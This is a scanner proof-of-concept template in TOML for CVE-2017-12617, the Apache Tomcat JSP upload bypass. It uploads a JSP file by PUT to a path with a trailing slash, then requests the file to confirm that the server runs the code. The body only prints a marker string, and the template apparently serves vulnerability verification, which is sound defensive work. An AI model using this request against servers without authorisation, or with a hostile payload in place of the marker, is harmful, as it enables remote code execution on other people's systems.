[info]
author = "ave"
description = "验证 Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 JSP上传绕过漏洞，通过PUT方法上传JSP文件并执行代码。"
id = "POC-AVE-2017-0508"
name = "CVE-2017-12617 Apache Tomcat JSP Upload Bypass RCE"
severity = "critical"
tags = ["ave-2017-0508"]
vuln_id = [
    "CVE-2017-12617",
    "AVE-2017-0508",
]

[poc]
logic = "all"

[[poc.requests]]
method = "PUT"
path = "/{{randstr}}.jsp/"
protocol = "http"

[poc.requests.body]
content = '<% out.println("CVE-2017-12617");%>'
type = "raw"

[poc.requests.headers]
User-Agent = "AVE/1.0"

[[poc.requests.matchers]]
expect = true
status = [
    201,
    204,
]
type = "status"

[[poc.requests]]
method = "GET"
path = "/{{randstr}}.jsp"
protocol = "http"

[poc.requests.headers]
User-Agent = "AVE/1.0"

[[poc.requests.matchers]]
expect = true
part = "body"
type = "word"
words = ["CVE-2017-12617"]

[[poc.requests.matchers]]
expect = true
status = [200]
type = "status"
